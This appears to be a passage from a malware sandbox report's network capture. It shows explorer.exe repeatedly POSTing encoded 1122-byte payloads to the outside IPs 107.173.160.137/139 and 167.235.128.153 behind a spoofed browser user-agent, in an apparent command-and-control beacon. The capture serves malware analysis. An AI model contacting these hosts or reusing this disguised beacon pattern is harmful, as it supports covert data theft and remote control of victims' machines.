2024-07-27 06:56:17 UTC	1267	OUT	Data Raw: 68 4e 43 46 34 35 76 68 65 58 70 52 43 49 67 44 37 2f 4a 4e 70 68 2b 2b 49 66 64 69 35 67 45 6c 55 4b 4b 41 56 46 42 78 67 4f 41 42 58 56 47 4d 6f 6b 61 41 77 38 43 73 41 55 6e 33 37 79 55 73 38 6b 6e 58 4f 63 4b 61 33 6e 2f 78 64 62 4f 62 45 75 37 78 36 6f 38 43 71 59 58 77 66 45 65 69 62 4b 45 74 62 4a 59 30 53 78 66 62 42 59 68 34 59 65 50 44 50 78 6a 31 72 32 69 61 71 55 64 5a 68 65 30 77 37 33 70 57 4e 48 36 48 59 59 37 50 63 6d 2b 38 77 5a 79 4d 6c 32 31 52 4f 58 33 77 74 2b 43 61 2f 47 39 54 6a 46 4f 64 54 71 51 68 43 67 2f 33 54 6f 67 45 54 61 6a 6e 44 4e 52 4c 68 74 69 75 63 7a 75 4e 5a 66 4e 41 70 35 34 70 77 31 35 75 79 71 6e 68 4b 2b 72 4c 6f 46 52 55 6e 79 49 67 37 39 46 2b 6f 54 4d 76 62 36 4b 53 66 42 57 6f 77 41 4c 6d 37 49 7a 54 4a 42 61 Data Ascii: hNCF45vheXpRCIgD7/JNph++Ifdi5gElUKKAVFBxgOABXVGMokaAw8CsAUn37yUs8knXOcKa3n/xdbObEu7x6o8CqYXwfEeibKEtbJY0SxfbBYh4YePDPxj1r2iaqUdZhe0w73pWNH6HYY7Pcm+8wZyMl21ROX3wt+Ca/G9TjFOdTqQhCg/3TogETajnDNRLhtiuczuNZfNAp54pw15uyqnhK+rLoFRUnyIg79F+oTMvb6KSfBWowALm7IzTJBa
2024-07-27 06:56:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:18 UTC	685	IN	Data Raw: 75 54 6c 47 44 43 54 78 55 52 46 76 50 53 77 44 74 65 39 50 36 38 36 7a 51 33 5a 30 4d 61 62 73 4f 79 46 37 43 76 55 62 54 4a 6b 48 4b 51 4f 62 4f 5a 58 66 31 48 4e 65 31 31 4d 4f 44 36 55 55 62 57 56 70 42 51 4d 4b 2f 57 54 79 4b 58 50 47 50 6f 65 53 32 4d 44 71 6c 6a 38 50 48 69 68 61 59 41 73 45 76 61 39 6e 6b 63 6e 39 63 56 51 69 6a 67 6c 63 30 78 7a 39 6e 78 69 56 43 59 55 39 61 63 6d 58 4d 62 6b 72 49 58 47 43 46 38 7a 66 2b 2b 61 59 31 4c 70 74 2b 72 44 65 75 38 53 4b 2b 68 4d 39 66 64 63 48 2f 4a 79 75 56 35 5a 47 4e 6f 65 55 71 6c 41 46 47 35 34 41 4c 33 6e 2b 34 76 43 4e 63 2b 46 64 74 50 61 4d 4f 6f 70 5a 55 52 37 59 74 31 73 75 63 55 4c 38 4c 74 73 6f 70 66 71 58 42 73 5a 2b 41 7a 68 58 62 4b 49 4f 38 78 57 6e 44 79 4b 6f 6b 6a 31 57 71 75 34 Data Ascii: uTlGDCTxURFvPSwDte9P686zQ3Z0MabsOyF7CvUbTJkHKQObOZXf1HNe11MOD6UUbWVpBQMK/WTyKXPGPoeS2MDqlj8PHihaYAsEva9nkcn9cVQijglc0xz9nxiVCYU9acmXMbkrIXGCF8zf++aY1Lpt+rDeu8SK+hM9fdcH/JyuV5ZGNoeUqlAFG54AL3n+4vCNc+FdtPaMOopZUR7Yt1sucUL8LtsopfqXBsZ+AzhXbKIO8xWnDyKokj1Wqu4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50812	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:19 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:19 UTC	1122	OUT	Data Raw: 6c 47 69 52 76 51 7a 4b 52 46 44 69 52 76 62 79 5a 52 75 65 2f 66 71 59 4c 35 49 77 39 4b 77 72 39 67 55 56 78 41 68 64 56 47 73 79 78 62 45 73 31 34 4c 59 57 42 46 36 42 48 59 2b 70 73 48 48 73 59 33 45 6f 48 44 70 43 4e 62 2b 75 7a 37 71 55 68 6b 7a 45 4c 6a 2f 2f 79 33 37 58 4b 6a 4e 42 6d 5a 4d 2f 6a 43 7a 66 62 59 6c 6e 2f 4d 57 39 45 49 68 6f 72 59 62 39 51 73 78 2f 2b 6c 33 6e 2f 41 39 58 74 69 58 2f 2f 35 74 69 47 35 59 72 38 49 61 6e 34 56 50 47 35 4c 70 38 4e 6c 6e 51 6a 64 57 62 31 30 49 54 4b 72 54 54 69 41 62 34 55 31 58 34 4b 6d 7a 47 54 30 32 55 66 69 77 49 4d 48 6f 75 45 68 6f 31 30 30 5a 37 37 6e 67 4d 47 66 74 70 64 54 37 36 74 33 43 58 37 77 77 4c 76 6c 65 4c 46 57 6b 71 58 47 59 30 38 33 4b 59 58 42 38 44 39 45 31 77 31 70 6b 7a 42 69 Data Ascii: lGiRvQzKRFDiRvbyZRue/fqYL5Iw9Kwr9gUVxAhdVGsyxbEs14LYWBF6BHY+psHHsY3EoHDpCNb+uz7qUhkzELj//y37XKjNBmZM/jCzfbYln/MW9EIhorYb9Qsx/+l3n/A9XtiX//5tiG5Yr8Ian4VPG5Lp8NlnQjdWb10ITKrTTiAb4U1X4KmzGT02UfiwIMHouEho100Z77ngMGftpdT76t3CX7wwLvleLFWkqXGY083KYXB8D9E1w1pkzBi
2024-07-27 06:56:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:20 UTC	685	IN	Data Raw: 47 4c 70 2b 39 6c 42 62 74 6a 6b 77 6a 44 4b 77 4d 73 45 32 2b 6e 6a 50 79 65 4d 32 37 4e 70 6b 62 37 46 47 65 79 36 4d 34 4b 6b 37 72 37 6b 48 53 63 76 6c 6b 52 31 6c 79 69 77 4d 33 79 44 49 73 6a 72 73 77 41 65 4f 68 61 72 41 4d 58 46 39 2f 43 56 47 50 32 4d 37 57 52 71 4f 6a 4e 42 55 5a 30 78 59 44 69 39 72 57 5a 76 4c 32 67 59 71 6c 70 42 75 6f 6b 4c 50 54 63 79 58 54 54 4d 4d 51 43 4c 68 7a 59 66 48 69 62 32 6d 5a 56 2f 2b 2b 42 6c 74 57 72 70 4e 47 6a 34 44 73 65 36 6d 43 37 71 6c 52 35 30 33 2f 45 38 56 46 72 76 2f 50 59 7a 70 36 5a 69 58 37 38 6d 73 33 53 4e 67 67 59 41 66 46 4f 45 2b 4a 6c 77 51 58 4e 67 39 68 75 2f 66 39 4a 58 65 34 47 52 32 73 42 4c 30 66 77 53 66 54 30 42 72 54 57 2b 35 41 68 6a 6e 2f 74 32 52 50 71 46 36 79 57 4c 78 36 61 47 Data Ascii: GLp+9lBbtjkwjDKwMsE2+njPyeM27Npkb7FGey6M4Kk7r7kHScvlkR1lyiwM3yDIsjrswAeOharAMXF9/CVGP2M7WRqOjNBUZ0xYDi9rWZvL2gYqlpBuokLPTcyXTTMMQCLhzYfHib2mZV/++BltWrpNGj4Dse6mC7qlR503/E8VFrv/PYzp6ZiX78ms3SNggYAfFOE+JlwQXNg9hu/f9JXe4GR2sBL0fwSfT0BrTW+5Ahjn/t2RPqF6yWLx6aG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50813	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:21 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:21 UTC	1122	OUT	Data Raw: 6a 78 52 38 32 4f 71 32 30 46 72 73 51 68 76 45 35 57 4d 53 52 2f 46 61 70 66 38 47 6e 6d 55 51 4b 68 42 63 73 6a 61 47 63 30 6a 73 58 2f 77 38 2f 41 39 70 4a 6e 6a 53 30 5a 70 38 77 56 57 4f 53 77 75 63 74 4a 68 2b 65 47 51 72 4e 44 59 52 68 33 75 31 6c 41 63 43 45 6a 76 61 44 43 57 70 37 56 56 2f 77 37 54 74 58 47 30 59 41 65 6e 31 6f 58 44 50 53 4b 33 33 2b 32 49 70 79 6f 73 6f 73 51 6f 4b 4b 61 48 5a 41 68 6d 43 79 70 51 38 4b 73 48 31 58 52 4f 38 70 39 32 4b 49 62 38 70 75 6f 2f 34 63 42 4f 74 44 4d 67 31 39 51 51 51 56 55 4c 4d 38 79 78 6b 58 75 6f 6d 53 77 52 4d 64 38 69 6f 2f 62 61 4b 64 32 70 61 71 78 30 46 66 75 4d 68 4b 67 6d 46 77 4a 4f 33 69 6c 64 75 58 36 6f 6a 78 31 59 69 6f 59 78 39 6e 2f 50 31 75 62 43 5a 54 49 57 5a 55 35 6f 45 49 74 6e Data Ascii: jxR82Oq20FrsQhvE5WMSR/Fapf8GnmUQKhBcsjaGc0jsX/w8/A9pJnjS0Zp8wVWOSwuctJh+eGQrNDYRh3u1lAcCEjvaDCWp7VV/w7TtXG0YAen1oXDPSK33+2IpyososQoKKaHZAhmCypQ8KsH1XRO8p92KIb8puo/4cBOtDMg19QQQVULM8yxkXuomSwRMd8io/baKd2paqx0FfuMhKgmFwJO3ilduX6ojx1YioYx9n/P1ubCZTIWZU5oEItn
2024-07-27 06:56:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:22 UTC	685	IN	Data Raw: 76 31 2f 57 34 6b 33 59 72 4b 47 7a 4c 77 53 68 67 36 79 2f 55 34 5a 68 6b 77 50 39 4f 6a 70 6a 61 61 51 5a 38 46 63 30 63 46 4c 55 76 48 6f 30 44 4f 42 69 53 37 66 4a 39 54 72 66 43 51 78 7a 41 72 52 65 42 55 65 56 32 77 31 64 53 5a 5a 46 61 43 32 2b 76 73 48 54 43 6b 76 54 47 37 70 56 61 79 62 6b 36 4b 34 6c 53 62 39 59 4e 79 4f 48 75 32 30 65 42 58 72 67 61 2f 37 6b 51 35 30 57 69 41 41 56 63 4e 72 43 6f 63 41 48 30 35 52 68 5a 45 37 66 32 42 4a 48 39 35 79 68 6e 4f 59 33 58 41 41 37 69 44 6d 32 53 33 79 4f 77 62 70 6a 70 61 41 62 51 76 68 36 6a 47 62 55 46 76 4a 36 73 77 76 71 4f 47 50 4f 32 34 38 5a 48 69 4b 56 6c 59 5a 6b 32 76 79 69 6e 6d 52 4d 6d 6c 35 65 75 75 43 46 38 53 6d 55 44 4a 62 72 7a 42 68 68 4e 6d 6a 6a 38 32 70 4d 51 44 36 4c 4a 71 76 Data Ascii: v1/W4k3YrKGzLwShg6y/U4ZhkwP9OjpjaaQZ8Fc0cFLUvHo0DOBiS7fJ9TrfCQxzArReBUeV2w1dSZZFaC2+vsHTCkvTG7pVaybk6K4lSb9YNyOHu20eBXrga/7kQ50WiAAVcNrCocAH05RhZE7f2BJH95yhnOY3XAA7iDm2S3yOwbpjpaAbQvh6jGbUFvJ6swvqOGPO248ZHiKVlYZk2vyinmRMml5euuCF8SmUDJbrzBhhNmjj82pMQD6LJqv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50814	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:23 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:23 UTC	1122	OUT	Data Raw: 6f 41 2b 46 2f 58 48 47 36 4e 35 57 4f 61 46 73 65 57 4b 66 59 36 78 67 6f 56 70 43 49 33 62 78 4a 6a 51 75 30 37 53 43 47 79 4a 65 77 50 38 45 63 71 69 53 4e 33 68 41 30 47 48 4d 39 43 37 42 58 48 4a 6e 37 58 33 58 39 39 4f 71 6a 36 4a 51 65 44 57 46 43 46 49 6f 59 6e 63 6b 4e 5a 62 4a 61 4a 76 54 69 56 41 55 72 6f 70 30 38 69 38 55 4b 54 75 78 77 35 50 44 62 53 77 4b 78 38 6d 31 65 57 41 54 71 62 68 35 44 79 73 58 74 4f 50 42 53 42 41 4f 6c 50 2b 58 2b 51 4b 53 52 31 43 68 45 74 4e 66 79 39 4c 75 59 4a 6f 6d 6d 5a 52 64 2b 30 78 59 58 69 4c 6d 30 52 71 4e 67 38 47 37 6d 6a 42 4b 33 59 2f 34 70 41 62 79 43 4c 52 6e 78 6d 38 64 33 76 6c 6d 77 35 6d 65 76 6f 48 5a 74 57 42 42 75 66 4c 33 2b 37 6c 74 65 79 77 39 30 4c 4a 30 2b 71 44 59 72 68 47 37 54 4f 2f Data Ascii: oA+F/XHG6N5WOaFseWKfY6xgoVpCI3bxJjQu07SCGyJewP8EcqiSN3hA0GHM9C7BXHJn7X3X99Oqj6JQeDWFCFIoYnckNZbJaJvTiVAUrop08i8UKTuxw5PDbSwKx8m1eWATqbh5DysXtOPBSBAOlP+X+QKSR1ChEtNfy9LuYJommZRd+0xYXiLm0RqNg8G7mjBK3Y/4pAbyCLRnxm8d3vlmw5mevoHZtWBBufL3+7lteyw90LJ0+qDYrhG7TO/
2024-07-27 06:56:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:24 UTC	685	IN	Data Raw: 41 44 66 4d 74 39 72 37 61 41 69 67 75 57 68 30 77 38 38 49 43 2b 42 53 61 4d 31 32 63 43 43 67 35 35 68 69 70 51 2f 32 49 7a 6c 2f 61 75 51 54 41 70 41 31 65 51 4e 5a 79 62 70 57 64 73 44 45 4c 4a 6c 34 35 69 52 37 73 4f 52 57 62 33 47 4a 64 41 37 65 6a 77 55 45 65 4a 63 75 75 48 4d 4b 56 42 75 72 66 4d 53 76 57 73 70 32 49 56 49 70 2b 6a 37 79 71 41 2f 4e 4e 35 6f 4f 63 71 51 6e 66 5a 44 4f 71 72 5a 4c 59 2b 45 58 41 74 6a 6c 33 49 6c 5a 50 54 76 56 66 34 48 4f 43 61 42 2b 42 7a 4a 6a 35 6a 4d 47 78 73 57 53 76 44 54 78 59 6d 7a 65 73 69 5a 50 72 37 38 52 48 32 54 64 62 52 69 64 58 77 33 47 72 52 72 51 53 4d 33 6d 42 35 65 73 75 71 47 41 32 7a 64 6a 5a 47 62 61 46 7a 57 43 4e 64 54 38 4e 6d 45 69 65 55 74 6f 73 6a 45 75 2f 77 35 42 34 54 6c 6a 62 51 4a Data Ascii: ADfMt9r7aAiguWh0w88IC+BSaM12cCCg55hipQ/2Izl/auQTApA1eQNZybpWdsDELJl45iR7sORWb3GJdA7ejwUEeJcuuHMKVBurfMSvWsp2IVIp+j7yqA/NN5oOcqQnfZDOqrZLY+EXAtjl3IlZPTvVf4HOCaB+BzJj5jMGxsWSvDTxYmzesiZPr78RH2TdbRidXw3GrRrQSM3mB5esuqGA2zdjZGbaFzWCNdT8NmEieUtosjEu/w5B4TljbQJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50816	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:25 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:25 UTC	1122	OUT	Data Raw: 57 4d 64 55 42 57 66 70 43 35 73 4c 37 4d 79 53 50 58 72 41 6e 66 48 4e 49 51 57 69 7a 39 33 48 79 35 32 68 45 62 4f 42 5a 4a 61 73 6c 6f 41 32 52 53 55 6d 66 76 7a 62 74 31 52 61 35 32 4f 31 31 4c 57 51 6c 2b 76 50 6f 76 63 4a 6a 2b 59 49 73 79 54 49 57 77 49 51 74 30 70 75 33 6a 63 67 49 45 77 39 38 79 72 6e 49 4b 58 37 4d 78 7a 6d 5a 59 30 66 78 72 58 79 7a 50 79 51 42 69 77 35 65 58 53 31 38 51 6d 4a 52 71 4b 78 33 2b 77 55 6b 33 69 74 62 68 4d 47 63 70 64 31 7a 5a 75 56 59 46 42 76 76 61 48 44 78 43 77 50 72 2f 49 47 64 61 62 2f 65 36 2b 66 65 69 6f 61 2b 53 7a 59 53 38 75 31 36 4c 7a 68 49 30 62 70 38 65 4d 58 36 77 7a 61 63 7a 37 73 73 54 66 6e 67 66 77 62 57 35 58 63 37 43 52 31 72 69 63 67 63 52 56 66 53 6e 36 56 57 2f 53 4b 4a 4b 6f 41 6f 7a 34 Data Ascii: WMdUBWfpC5sL7MySPXrAnfHNIQWiz93Hy52hEbOBZJasloA2RSUmfvzbt1Ra52O11LWQl+vPovcJj+YIsyTIWwIQt0pu3jcgIEw98yrnIKX7MxzmZY0fxrXyzPyQBiw5eXS18QmJRqKx3+wUk3itbhMGcpd1zZuVYFBvvaHDxCwPr/IGdab/e6+feioa+SzYS8u16LzhI0bp8eMX6wzacz7ssTfngfwbW5Xc7CR1ricgcRVfSn6VW/SKJKoAoz4
2024-07-27 06:56:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:26 UTC	685	IN	Data Raw: 42 37 61 33 30 47 31 51 5a 63 74 67 51 6d 48 71 32 75 77 67 47 78 64 67 71 4f 68 75 32 66 67 49 41 6a 58 59 51 42 56 53 36 74 56 6f 4e 6e 71 49 69 2b 6f 37 61 46 32 5a 33 4f 31 48 59 4f 55 52 6a 37 6b 31 36 2b 6a 55 5a 49 79 71 2f 39 42 55 71 6f 39 70 34 33 52 43 71 38 62 54 43 6d 54 4c 34 2b 59 73 32 46 2b 77 7a 4e 2f 54 48 32 68 55 71 65 44 2b 37 4c 56 38 64 4f 66 62 55 4b 65 53 39 2b 48 54 59 65 72 79 43 46 35 73 48 77 31 66 55 6f 63 6b 2f 4f 5a 50 66 37 45 6a 6f 52 49 37 31 74 35 4c 4a 61 6d 58 2b 74 33 70 66 30 72 6e 64 2f 50 4c 4f 33 65 38 48 75 4f 44 30 72 4b 6f 37 34 34 5a 63 52 71 4b 64 6c 54 76 6a 48 59 53 2f 55 74 59 4e 46 61 46 30 59 42 33 74 37 33 70 57 2f 63 72 6c 4f 77 46 74 4c 4d 63 65 53 71 69 59 38 47 36 2b 4d 52 4f 6a 6a 42 4e 64 44 38 Data Ascii: B7a30G1QZctgQmHq2uwgGxdgqOhu2fgIAjXYQBVS6tVoNnqIi+o7aF2Z3O1HYOURj7k16+jUZIyq/9BUqo9p43RCq8bTCmTL4+Ys2F+wzN/TH2hUqeD+7LV8dOfbUKeS9+HTYeryCF5sHw1fUock/OZPf7EjoRI71t5LJamX+t3pf0rnd/PLO3e8HuOD0rKo744ZcRqKdlTvjHYS/UtYNFaF0YB3t73pW/crlOwFtLMceSqiY8G6+MROjjBNdD8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50817	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:28 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:28 UTC	1122	OUT	Data Raw: 62 7a 63 61 59 51 77 32 53 44 6c 46 2f 50 68 63 6f 67 73 73 44 6a 34 61 32 4d 72 30 30 6c 46 4a 32 35 71 6c 62 7a 53 52 64 67 63 51 33 65 79 51 33 4f 63 66 6e 74 4b 41 50 72 70 70 50 4a 70 58 78 55 6c 54 33 39 62 65 41 52 71 52 46 6c 51 5a 6a 66 72 37 56 68 74 52 52 34 6e 45 7a 32 74 61 71 66 56 47 78 4e 65 2f 7a 31 73 71 70 35 58 5a 73 73 77 56 57 79 6f 66 2b 41 50 35 68 71 74 6d 71 77 67 44 68 48 51 31 4c 73 79 49 30 69 49 30 37 32 57 32 34 56 7a 54 65 68 50 7a 73 4c 61 49 4e 63 71 68 78 48 37 76 36 6f 46 33 6c 42 76 58 61 4d 6a 56 77 59 4e 78 75 4f 58 7a 53 4c 43 56 79 70 79 42 6c 64 52 45 6d 42 7a 67 42 51 4a 4f 68 79 42 64 72 41 39 43 4f 47 4d 79 33 4c 35 58 78 36 42 75 69 73 62 4b 47 32 71 6a 4a 4a 65 58 47 70 74 49 4e 66 74 59 71 63 46 71 79 6e 38 Data Ascii: bzcaYQw2SDlF/PhcogssDj4a2Mr00lFJ25qlbzSRdgcQ3eyQ3OcfntKAPrppPJpXxUlT39beARqRFlQZjfr7VhtRR4nEz2taqfVGxNe/z1sqp5XZsswVWyof+AP5hqtmqwgDhHQ1LsyI0iI072W24VzTehPzsLaINcqhxH7v6oF3lBvXaMjVwYNxuOXzSLCVypyBldREmBzgBQJOhyBdrA9COGMy3L5Xx6BuisbKG2qjJJeXGptINftYqcFqyn8
2024-07-27 06:56:29 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:29 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:29 UTC	685	IN	Data Raw: 56 51 4c 6e 77 45 45 68 61 59 6e 36 73 72 73 44 70 4c 51 6f 33 6f 65 32 4f 6c 44 36 6d 31 51 30 48 61 45 33 44 53 6f 4b 46 6e 79 65 2b 63 6d 32 6e 6e 50 53 52 61 39 4f 53 30 6b 59 59 75 77 49 68 4a 2b 41 6a 34 63 52 50 4d 4e 78 30 57 6c 35 76 68 6a 2b 72 4a 43 50 76 4f 47 4a 31 71 65 52 2f 30 37 49 45 6f 61 45 4d 55 31 68 5a 32 30 51 39 68 31 64 53 4f 68 58 64 6b 50 64 4f 6f 4f 44 69 6c 76 30 4e 54 7a 6e 45 4a 77 75 6b 64 6f 52 54 59 6e 55 43 59 38 39 44 77 70 78 2b 53 41 78 77 57 69 68 33 6a 47 43 75 71 61 4b 54 31 6f 2f 56 45 45 5a 62 51 35 78 79 72 7a 6a 76 73 59 45 43 45 32 6a 6d 4f 74 49 6d 43 44 52 6e 46 52 57 57 68 68 57 74 4f 76 73 48 72 33 34 69 2b 79 72 55 41 2b 38 73 63 59 68 46 4f 70 2b 57 7a 68 70 43 75 2f 7a 6f 36 46 50 6d 37 62 46 62 69 74 Data Ascii: VQLnwEEhaYn6srsDpLQo3oe2OlD6m1Q0HaE3DSoKFnye+cm2nnPSRa9OS0kYYuwIhJ+Aj4cRPMNx0Wl5vhj+rJCPvOGJ1qeR/07IEoaEMU1hZ20Q9h1dSOhXdkPdOoODilv0NTznEJwukdoRTYnUCY89Dwpx+SAxwWih3jGCuqaKT1o/VEEZbQ5xyrzjvsYECE2jmOtImCDRnFRWWhhWtOvsHr34i+yrUA+8scYhFOp+WzhpCu/zo6FPm7bFbit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50818	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:30 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:30 UTC	1122	OUT	Data Raw: 6b 6c 5a 36 50 31 6b 6f 36 79 44 71 4c 37 37 31 6c 74 76 33 71 34 55 70 67 64 37 45 52 6d 57 44 64 35 66 64 2f 4a 52 2f 76 31 34 56 61 69 79 35 72 4b 31 62 78 42 4e 4b 39 79 68 6f 65 79 66 43 75 53 6b 75 34 43 62 50 30 38 42 65 69 75 69 70 44 6d 4f 76 54 6f 76 52 41 51 5a 67 30 72 51 68 69 46 39 45 75 43 77 73 5a 41 52 43 52 52 73 34 4a 55 33 41 73 51 4f 53 42 70 36 4f 66 2f 4e 79 54 66 72 51 50 32 34 63 58 72 51 73 31 36 52 63 70 46 6d 6f 4e 57 2b 33 74 61 73 6b 70 4f 67 63 37 55 64 34 42 34 69 41 79 30 66 4f 4c 73 71 44 38 4a 33 58 73 4e 4b 32 35 63 7a 79 32 6d 41 37 71 61 52 6f 50 52 79 65 64 48 5a 51 73 4b 59 74 36 52 78 72 56 55 75 71 65 70 71 65 50 42 4d 4c 43 31 43 69 52 44 58 79 73 6b 5a 66 6e 33 50 72 53 30 41 35 78 6d 51 6e 72 6c 79 6a 46 2b 2f Data Ascii: klZ6P1ko6yDqL771ltv3q4Upgd7ERmWDd5fd/JR/v14Vaiy5rK1bxBNK9yhoeyfCuSku4CbP08BeiuipDmOvTovRAQZg0rQhiF9EuCwsZARCRRs4JU3AsQOSBp6Of/NyTfrQP24cXrQs16RcpFmoNW+3taskpOgc7Ud4B4iAy0fOLsqD8J3XsNK25czy2mA7qaRoPRyedHZQsKYt6RxrVUuqepqePBMLC1CiRDXyskZfn3PrS0A5xmQnrlyjF+/
2024-07-27 06:56:31 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:31 UTC	685	IN	Data Raw: 6e 65 49 2b 4e 2b 2f 44 45 39 77 31 59 37 78 45 53 4f 76 47 76 61 73 52 76 79 54 70 32 53 53 53 48 35 32 73 4a 6a 2f 78 61 57 49 2b 33 54 72 58 78 7a 44 6a 5a 39 39 58 54 46 79 2f 75 54 44 5a 63 71 68 43 57 48 52 48 74 55 6b 65 48 4d 2b 4f 58 6b 5a 33 53 53 5a 57 4a 4a 6a 30 33 71 33 67 64 43 52 45 2f 43 33 71 35 69 4c 4b 33 76 2f 33 47 37 42 52 74 43 4a 6e 43 67 41 51 48 65 77 44 4d 74 32 69 4c 2b 71 53 45 7a 54 42 5a 2f 74 5a 73 5a 67 47 79 30 54 39 44 41 31 61 38 4f 64 57 38 47 65 52 64 46 6e 64 59 79 73 69 56 47 34 51 6f 52 44 64 70 51 4b 70 4a 31 6d 63 4a 58 4b 65 52 38 38 45 69 6d 31 6c 53 6e 4d 34 30 48 63 6b 79 49 36 4d 72 43 30 58 48 65 49 67 32 61 6a 67 37 4a 6b 33 2b 73 50 4c 49 53 67 4d 56 47 4b 77 42 31 65 57 70 51 36 70 6b 43 59 32 31 6d 70 Data Ascii: neI+N+/DE9w1Y7xESOvGvasRvyTp2SSSH52sJj/xaWI+3TrXxzDjZ99XTFy/uTDZcqhCWHRHtUkeHM+OXkZ3SSZWJJj03q3gdCRE/C3q5iLK3v/3G7BRtCJnCgAQHewDMt2iL+qSEzTBZ/tZsZgGy0T9DA1a8OdW8GeRdFndYysiVG4QoRDdpQKpJ1mcJXKeR88Eim1lSnM40HckyI6MrC0XHeIg2ajg7Jk3+sPLISgMVGKwB1eWpQ6pkCY21mp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50819	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:32 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:32 UTC	1122	OUT	Data Raw: 71 57 65 4e 58 59 39 45 53 33 37 56 73 2b 72 41 58 6e 43 55 79 52 45 67 53 38 31 43 65 58 6b 31 41 50 2f 76 36 75 6b 66 47 54 55 6f 73 75 68 63 38 37 5a 57 66 70 42 37 6f 79 31 48 58 44 4e 59 2b 39 72 74 65 51 6d 4c 70 56 45 4b 69 6c 4e 52 55 78 50 33 4a 51 6e 43 71 43 35 6e 76 41 2f 49 74 2b 6b 39 48 52 53 74 68 63 74 61 6b 6f 75 6e 6c 72 4e 2b 2f 5a 4c 31 39 48 62 30 56 70 2b 36 73 58 76 74 76 4e 50 37 42 36 6a 30 51 7a 4f 41 43 4b 38 6c 77 5a 6f 70 38 57 4b 4d 53 79 44 68 6e 67 64 78 55 36 6c 57 74 2b 44 78 45 7a 32 38 63 63 48 48 2b 34 43 55 41 7a 38 64 6b 30 76 69 4f 55 48 45 56 35 4c 57 68 6c 45 44 79 75 31 74 6b 78 61 77 43 4c 69 67 38 50 4c 6b 36 34 34 32 39 2b 4b 70 4a 4e 4e 68 73 55 69 6f 41 34 51 54 67 4c 4f 2f 38 72 69 67 65 33 44 44 59 76 65 Data Ascii: 